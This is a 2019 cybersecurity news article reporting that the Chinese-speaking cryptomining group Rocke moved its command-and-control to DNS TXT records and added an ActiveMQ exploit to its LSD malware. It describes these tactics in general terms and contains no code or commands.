16 October 2019

Chinese cybercrime group Rocke uses new tactics to evade detection

Chinese cybercrime group Rocke uses new tactics to evade detection

Chinese-speaking cybercrime group Rocke, which is believed to be responsible for several large-scale cryptomining campaigns in past, is now using new Tactics, Techniques, and Procedures (TTPs), including new C2 infrastructure and updated malware in order to evade detection.

First reports on group’s illicit cryptomining operations emerged in August 2018, when Rocke attacked unpatched Apache Struts, Oracle WebLogic, and Adobe ColdFusion servers and infected compromised servers with cryptomining malware. Earlier this year researchers from Palo Alto Networks Unit42 discovered new malware samples used by the hackers for cryptojacking that uninstall from Linux servers cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud. In March, the threat actor was using a dropper dubbed LSD that was controlled via Pastebin, but this summer Rocke has switched to a new Command and Control (C2) infrastructure moving away from Pastebin in favor of a self-hosted solution, according to researchers from cybersecurity outfit Anomaly.

“In September 2019, the actor moved away from hosting the scripts on dedicated servers and instead started to use Domain Name System (DNS) text records. These records are accessed via normal DNS queries or DNS-over-HTTPs (DoH) if the DNS query fails,” the experts said. The use of self-hosted and DNS records makes it hard to detect the group’s malicious operations and takedowns, they added.

In the previous campaigns the Rocke group was observed exploiting the CVE-2019-3396 flaw in Confluence servers to get remote code execution and deliver the miners, but recently the attackers added a new functionality to their LSD malware to exploit ActiveMQ servers vulnerable to CVE-2016-3088. CVE-2016-3088 is a vulnerability in ActiveMQ that can allow uploading of an arbitrary file.

To ensure that only its cryptomining malware runs on the infected host, the group tries to terminate all other processes with high CPU usage. The LSD malware identifies its miner via the MD5 hash of the file to make sure it doesn’t kill its miner.

“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” the researchers concluded.

Additional details about Rocke’s activity, including Indicators of Compromise (IoCs) are available in the Anomaly blog post.

Back to the list

Latest Posts

Researchers warn of a spike in TCP DDoS reflection attacks targeting large corporations

Researchers warn of a spike in TCP DDoS reflection attacks targeting large corporations

The list of latest victims includes Amazon, IBM subsidiary SoftLayer, Eurobet Italia SRL, Korea Telecom, HZ Hosting and SK Broadband.
12 November 2019
One of the world’s most tech-savvy APT’s adds a new stealthy backdoor to its toolkit

One of the world’s most tech-savvy APT’s adds a new stealthy backdoor to its toolkit

Platinum group exploits Windows with hidden backdoor trojan mimicking common legitimate software.
11 November 2019
Hackers deliver NanoCore malware using a creatively crafted ZIP archive

Hackers deliver NanoCore malware using a creatively crafted ZIP archive

Attackers devised a new technique designed to bypass secure email gateways to deliver NanoCore RAT.
8 November 2019
Featured vulnerabilities
Spoofing attack in Microsoft Azure Stack
Medium Patched | 13 Nov, 2019
Privilege escalation in Windows Installer
Low Patched | 13 Nov, 2019
Information disclosure in Open Enclave SDK
Low Patched | 13 Nov, 2019